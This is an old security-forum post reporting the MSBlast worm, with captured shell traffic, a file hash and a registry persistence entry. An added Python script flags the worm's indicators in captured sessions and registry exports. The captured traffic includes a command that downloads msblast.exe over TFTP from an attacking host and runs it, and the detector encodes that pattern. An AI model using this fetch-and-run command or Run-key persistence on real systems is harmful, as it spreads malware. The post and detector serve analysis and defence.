August 12th, 2003, 01:58 AM
#24
Member
Hi people!
Hispasec (www.hispasec.com) reported today a new worm based on the RPC exploit...
The worm sends commands to a Windows shell on TCP port 4444.
Here is the captured traffic...
-------------traffic 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
-------------traffic 4444/tcp----------
msblast.exe is a Windows file, 6 KB in length.
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
The download is from these TFTP servers:
The worm makes an entry in the Windows registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"windows auto update"="msblast.exe"
****************************************************************************************
Keep your eyes open!!
See u!
Groby
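
The two indicators in the post above (a `tftp -i <host> GET <file>` command followed by launching the file on 4444/tcp, and a value under the `Run` key) can be checked for in captured data. This is an added example, not part of the original post; the function names, the 192.0.2.10 address and the sample inputs are constructed for illustration.

```python
import re

# Shell command of the form seen in the post: tftp -i <host> GET <file>
TFTP_GET = re.compile(r"^\s*tftp(?:\.exe)?\s+-i\s+(\S+)\s+GET\s+(\S+)", re.I)
# A line that launches an executable, with or without a leading "start"
START = re.compile(r"^\s*(?:start\s+)?(\S+\.exe)\s*$", re.I)
# One value line of a Run-key listing: "name"="data"
RUN_VALUE = re.compile(r'^\s*"([^"]+)"\s*=\s*"([^"]+)"\s*$')

def scan_session(payload):
    """Return one finding per TFTP fetch in a reassembled TCP payload,
    noting whether the fetched file is launched later in the same session."""
    findings = []
    for line in payload.splitlines():
        m = TFTP_GET.match(line)
        if m:
            findings.append({"source": m.group(1), "file": m.group(2).lower(),
                             "executed": False})
            continue
        m = START.match(line)
        if m:
            for f in findings:
                if f["file"] == m.group(1).lower():
                    f["executed"] = True
    return findings

def scan_run_key(export_text, filenames):
    """Return Run-key value names whose data references any fetched file."""
    hits = []
    for line in export_text.splitlines():
        m = RUN_VALUE.match(line)
        if m and any(name in m.group(2).lower() for name in filenames):
            hits.append(m.group(1))
    return hits

# Constructed sample inputs (address taken from the documentation range).
SAMPLE_SESSION = (
    "tftp -i 192.0.2.10 GET msblast.exe\n"
    "start msblast.exe\n"
    "msblast.exe\n"
)
SAMPLE_RUN_KEY = (
    '"windows auto update"="msblast.exe"\n'
    '"SomeVendorTray"="C:\\Program Files\\Vendor\\tray.exe"\n'
)

if __name__ == "__main__":
    found = scan_session(SAMPLE_SESSION)
    print(found)
    print(scan_run_key(SAMPLE_RUN_KEY, {f["file"] for f in found}))
```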